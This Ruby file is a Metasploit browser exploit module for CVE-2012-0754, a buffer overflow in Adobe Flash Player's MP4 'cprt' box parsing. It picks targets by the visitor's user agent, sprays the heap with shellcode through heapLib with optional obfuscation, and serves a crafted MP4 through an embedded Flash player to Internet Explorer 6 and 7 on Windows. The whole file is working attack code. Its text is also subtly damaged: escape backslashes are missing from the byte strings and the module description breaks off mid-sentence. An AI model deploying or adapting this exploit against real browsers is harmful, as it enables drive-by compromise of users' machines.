require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info={})

super(update_info(info,

'Name' => "Adobe Flash Player MP4 cprt box Buffer Overflow",

'Description' => %q{

This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx

component. When processing a MP4 file

},

'License' => MSF_LICENSE,

'Author' =>

[

'hongin[at]zeroxss.com'

],

'References' =>

[

[ 'CVE', '2012-0754' ],

],

'Payload' =>

{

'BadChars' => "x00",

'StackAdjustment' => -3500

},

'DefaultOptions' =>

{

'ExitFunction' => "seh",

'InitialAutoRunScript' => 'migrate -f'

},

'Platform' => 'win',

'Targets' =>

[

[ 'Automatic', {} ],

[ 'IE 6 on Windows XP SP3', { 'Offset' => '0x600' } ], #0x5f4 = spot on

[ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ]

],

'Privileged' => false,

'DisclosureDate' => "2012.03.06",

'DefaultTarget' => 0))

register_options(

[

OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),

OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])

], self.class)

end

def get_target(agent)

#If the user is already specified by the user, we'll just use that

return target if target.name != 'Automatic'

if agent =~ /NT 5.1/ and agent =~ /MSIE 6/

return targets[1]

elsif agent =~ /MSIE 7/

return targets[2]

else

return nil

end

end

def on_request_uri(cli, request)

agent = request.headers['User-Agent']

my_target = get_target(agent)

# Avoid the attack if the victim doesn't have the same setup we're targeting

if my_target.nil?

print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")

send_not_found(cli)

return

end

# The SWF requests our MP4 trigger

if request.uri =~ /.mp4$/

print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")

#print_error("Sorry, not sending you the mp4 for now")

#send_not_found(cli)

send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})

return

end

# Set payload depending on target

p = payload.encoded

js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))

js_nops = Rex::Text.to_unescape("x0c"*4, Rex::Arch.endian(target.arch))

js = <<-JS

var heap_obj = new heapLib.ie(0x20000);

var code = unescape("#{js_code}");

var nops = unescape("#{js_nops}");

while (nops.length < 0x80000) nops += nops;

var offset = nops.substring(0, #{my_target['Offset']});

var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

while (shellcode.length < 0x40000) shellcode += shellcode;

var block = shellcode.substring(0, (0x80000-6)/2);

heap_obj.gc();

for (var i=1; i < 0x300; i++) {

heap_obj.alloc(block);

}

JS

js = heaplib(js, {:noobfu => true})

if datastore['OBFUSCATE']

js = ::Rex::Exploitation::JSObfu.new(js)

js.obfuscate

end

myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']

mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"

swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}"

html = %Q|

<html>

<head>

<script>

#{js}

</script>

</head>

<body>

<object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">

<param name="movie" value="#{swf_uri}">

</object>

</body>

</html>

|

html = html.gsub(/^tt/, '')

print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")

send_response(cli, html, {'Content-Type'=>'text/html'})

end

def exploit

@mp4 = create_mp4

super

end

def create_mp4

ftypAtom = "x00x00x00x18" #Size

ftypAtom << "ftypmp42"

ftypAtom << "x00x00x00x00"

ftypAtom << "mp42isom"

mdatAtom = "x00x00x00x0D" #Size

mdatAtom << "cprt"

mdatAtom << "x00xFFxFFxFFx00x00x00x00"

m = ftypAtom + mdatAtom + "x0C" * 22328

return m

end

end